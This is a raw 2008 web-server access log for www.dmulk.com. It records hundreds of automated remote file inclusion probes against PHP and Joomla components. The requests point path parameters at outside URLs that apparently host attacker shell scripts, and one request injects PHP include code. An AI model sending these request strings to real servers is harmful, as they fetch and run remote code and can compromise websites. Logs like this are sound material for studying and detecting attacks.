216.127.66.129 - - [16/May/2008:12:01:01 -0700] "GET /logs//module_db.php?pivot_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.66.129 - - [16/May/2008:12:01:01 -0700] "GET /logs/access_080229.log//module_db.php?pivot_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
150.187.25.20 - - [16/May/2008:12:01:07 -0700] "GET /logs/access_080328.log/index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:12:01:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:12:01:07 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
150.187.25.20 - - [16/May/2008:12:01:12 -0700] "GET /logs/index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [16/May/2008:12:01:13 -0700] "GET /index.php?place=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.66.129 - - [16/May/2008:12:01:17 -0700] "GET //module_db.php?pivot_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.123.76 - - [16/May/2008:12:01:26 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:01:31 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
91.121.123.76 - - [16/May/2008:12:01:31 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.812" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:01:36 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
91.121.123.76 - - [16/May/2008:12:01:37 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11607 "-" "libwww-perl/5.812" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:01:59 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:01:59 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:01:59 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:02:04 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:02:05 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:02:06 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:12:02:23 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:12:02:23 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:02:55 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:02:55 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:02:55 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:03:00 -0700] "GET /logs/access_080308.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.187.25.20 - - [16/May/2008:12:03:07 -0700] "GET /logs/access_080218.log//convert/mvcw.php?step=1&vwar_root=http://cogu.iespana.es/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:03:37 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:12:03:39 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:03:39 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [16/May/2008:12:03:40 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:03:47 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:03:52 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:03:52 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:03:55 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:03:58 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:03:59 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:04:00 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:04:13 -0700] "GET /logs/access_080117.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:04:14 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:04:14 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.89 - - [16/May/2008:12:04:17 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:04:18 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:12:04:18 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [16/May/2008:12:04:18 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.89 - - [16/May/2008:12:04:18 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 1121402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:04:29 -0700] "GET /logs/access_080308.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.25.230.39 - - [16/May/2008:12:04:57 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [16/May/2008:12:04:57 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:05:00 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:05:01 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:05:01 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:05:05 -0700] "GET /lib/functions.php?DOC_ROOT=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:05:05 -0700] "GET /logs/lib/functions.php?DOC_ROOT=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:05:16 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:05:31 -0700] "GET /logs/access_080120.log//akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:05:32 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:05:32 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:05:32 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.253.104.19 - - [16/May/2008:12:05:34 -0700] "GET /logs/errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:05:35 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:05:51 -0700] "GET /logs/config.php?path_to_root=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:05:51 -0700] "GET /config.php?path_to_root=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.244.44.10 - - [16/May/2008:12:06:07 -0700] "GET /config.php?path_to_root=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
77.244.44.10 - - [16/May/2008:12:06:08 -0700] "GET /logs/config.php?path_to_root=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.37.173.162 - - [16/May/2008:12:06:17 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [16/May/2008:12:06:18 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [16/May/2008:12:06:18 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.187 - - [16/May/2008:12:06:19 -0700] "GET /logs/ HTTP/1.0" 200 47683 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:12:06:52 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [16/May/2008:12:06:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:06:59 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:06:59 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:07:04 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.202.62.165 - - [16/May/2008:12:07:04 -0700] "GET / HTTP/1.0" 200 11590 "-" "-" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:07:04 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:07:05 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.805" "www.dmulk.com"
217.153.141.220 - - [16/May/2008:12:07:05 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:12:07:06 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [16/May/2008:12:07:06 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://welfare.skku.edu/bbs/files/id6.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.200.178 - - [16/May/2008:12:08:03 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:08:31 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:08:36 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:08:37 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.63" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:12:08:39 -0700] "GET /logs//citywriter/head.php?path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:12:08:39 -0700] "GET //citywriter/head.php?path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:08:40 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:08:40 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.192.227 - - [16/May/2008:12:08:41 -0700] "GET //SQuery/lib/doom3.php?libpath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:08:47 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:12:08:51 -0700] "GET /logs//skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:12:08:51 -0700] "GET //skins/advanced/advanced2.php?pluginpath[0]=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:12:08:53 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [16/May/2008:12:08:54 -0700] "GET /htmltonuke.php?filnavn=http://www.vennom.t35.com/cmdbuscador.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:08:59 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:09:00 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:05 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:09:10 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:13 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:09:22 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:09:25 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:09:26 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:09:27 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:09:28 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:30 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:37 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:38 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:09:39 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:44 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:09:44 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:09:45 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.63" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:49 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:56 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:09:56 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:10:08 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:10:19 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
